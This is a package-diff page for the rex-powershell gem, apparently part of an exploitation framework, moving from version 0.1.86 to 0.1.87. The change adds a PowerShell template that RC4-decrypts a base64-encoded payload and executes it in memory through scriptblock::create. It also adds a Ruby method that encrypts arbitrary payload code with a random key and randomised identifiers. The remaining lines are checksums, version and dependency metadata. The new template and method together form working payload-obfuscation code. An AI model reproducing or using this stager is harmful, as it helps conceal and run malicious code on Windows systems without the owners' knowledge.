rex-powershell 0.1.86 → 0.1.87
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/data/templates/to_mem_rc4.ps1.template +40 -0
- data/lib/rex/powershell/payload.rb +22 -0
- data/lib/rex/powershell/version.rb +1 -1
- data/rex-powershell.gemspec +1 -0
- metadata +17 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 764fea22dc597fbfbf2af172ae81f6dccebf23d280d94683cd3220987565e567
|
4
|
+
data.tar.gz: df359a4703480f97a0353d840283099960fca5db2679cc67a812ffe0d7a8770b
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: e491690da3d3fc1d0c4be168b6029d612da06b5012d05f4f7ad9aea85aaa088d154ce37f499244b765072e60067c87a13b25c3d356e8313092602ca4416a5e06
|
7
|
+
data.tar.gz: e8b2607028adf09d185abf0c0833240c3232198c78f9ff928b0c8936ec4592c7c88a988c96bdaf8dac26da33ff1e6d510297283bf276e2bc2bdb0fb0af489a67
|
checksums.yaml.gz.sig
CHANGED
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
@@ -0,0 +1,40 @@
|
|
1
|
+
function %{func_rc4_decrypt} {
|
2
|
+
param([Byte[]]$%{var_rc4buffer})
|
3
|
+
|
4
|
+
$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
|
5
|
+
|
6
|
+
$s = New-Object Byte[] 256;
|
7
|
+
$k = New-Object Byte[] 256;
|
8
|
+
|
9
|
+
for ($i = 0; $i -lt 256; $i++)
|
10
|
+
{
|
11
|
+
$s[$i] = [Byte]$i;
|
12
|
+
$k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
|
13
|
+
}
|
14
|
+
|
15
|
+
$j = 0;
|
16
|
+
for ($i = 0; $i -lt 256; $i++)
|
17
|
+
{
|
18
|
+
$j = ($j + $s[$i] + $k[$i]) %% 256;
|
19
|
+
$temp = $s[$i];
|
20
|
+
$s[$i] = $s[$j];
|
21
|
+
$s[$j] = $temp;
|
22
|
+
}
|
23
|
+
|
24
|
+
$i = $j = 0;
|
25
|
+
for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
|
26
|
+
{
|
27
|
+
$i = ($i + 1) %% 256;
|
28
|
+
$j = ($j + $s[$i]) %% 256;
|
29
|
+
$temp = $s[$i];
|
30
|
+
$s[$i] = $s[$j];
|
31
|
+
$s[$j] = $temp;
|
32
|
+
[int]$t = ($s[$i] + $s[$j]) %% 256;
|
33
|
+
$%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
|
34
|
+
}
|
35
|
+
|
36
|
+
$%{var_rc4buffer}
|
37
|
+
}
|
38
|
+
|
39
|
+
&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
|
40
|
+
|
@@ -1,5 +1,6 @@
|
|
1
1
|
# -*- coding: binary -*-
|
2
2
|
require 'rex/random_identifier'
|
3
|
+
require 'rc4'
|
3
4
|
|
4
5
|
module Rex
|
5
6
|
module Powershell
|
@@ -106,6 +107,27 @@ module Payload
|
|
106
107
|
read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
107
108
|
end
|
108
109
|
|
110
|
+
#
|
111
|
+
# PSH script that executes an RC4 encrypted payload with Invoke-Expression
|
112
|
+
# by Adrian Vollmer (SySS GmbH, https://www.syss.de)
|
113
|
+
#
|
114
|
+
def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
|
115
|
+
rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
|
116
|
+
rig.init_var(:func_rc4_decrypt)
|
117
|
+
rig.init_var(:var_rc4buffer)
|
118
|
+
rig.init_var(:var_key)
|
119
|
+
|
120
|
+
key = Rex::Text.rand_text_alpha(rand(8)+8)
|
121
|
+
rc4 = RC4.new(key)
|
122
|
+
enc_code = rc4.encrypt(code)
|
123
|
+
|
124
|
+
hash_sub = rig.to_h
|
125
|
+
hash_sub[:random_key] = key
|
126
|
+
hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
|
127
|
+
|
128
|
+
read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
|
129
|
+
end
|
130
|
+
|
109
131
|
end
|
110
132
|
end
|
111
133
|
end
|
data/rex-powershell.gemspec
CHANGED
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: rex-powershell
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.1.
|
4
|
+
version: 0.1.87
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- David 'thelightcosine' Maloney
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
93
93
|
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
94
94
|
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
95
95
|
-----END CERTIFICATE-----
|
96
|
-
date: 2020-02-
|
96
|
+
date: 2020-02-21 00:00:00.000000000 Z
|
97
97
|
dependencies:
|
98
98
|
- !ruby/object:Gem::Dependency
|
99
99
|
name: bundler
|
@@ -165,6 +165,20 @@ dependencies:
|
|
165
165
|
- - ">="
|
166
166
|
- !ruby/object:Gem::Version
|
167
167
|
version: '0'
|
168
|
+
- !ruby/object:Gem::Dependency
|
169
|
+
name: ruby-rc4
|
170
|
+
requirement: !ruby/object:Gem::Requirement
|
171
|
+
requirements:
|
172
|
+
- - ">="
|
173
|
+
- !ruby/object:Gem::Version
|
174
|
+
version: '0'
|
175
|
+
type: :runtime
|
176
|
+
prerelease: false
|
177
|
+
version_requirements: !ruby/object:Gem::Requirement
|
178
|
+
requirements:
|
179
|
+
- - ">="
|
180
|
+
- !ruby/object:Gem::Version
|
181
|
+
version: '0'
|
168
182
|
description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
|
169
183
|
scripts
|
170
184
|
email:
|
@@ -185,6 +199,7 @@ files:
|
|
185
199
|
- data/templates/to_mem_msil.ps1.template
|
186
200
|
- data/templates/to_mem_old.ps1.template
|
187
201
|
- data/templates/to_mem_pshreflection.ps1.template
|
202
|
+
- data/templates/to_mem_rc4.ps1.template
|
188
203
|
- lib/rex/powershell.rb
|
189
204
|
- lib/rex/powershell/command.rb
|
190
205
|
- lib/rex/powershell/function.rb
|
metadata.gz.sig
CHANGED
Binary file
|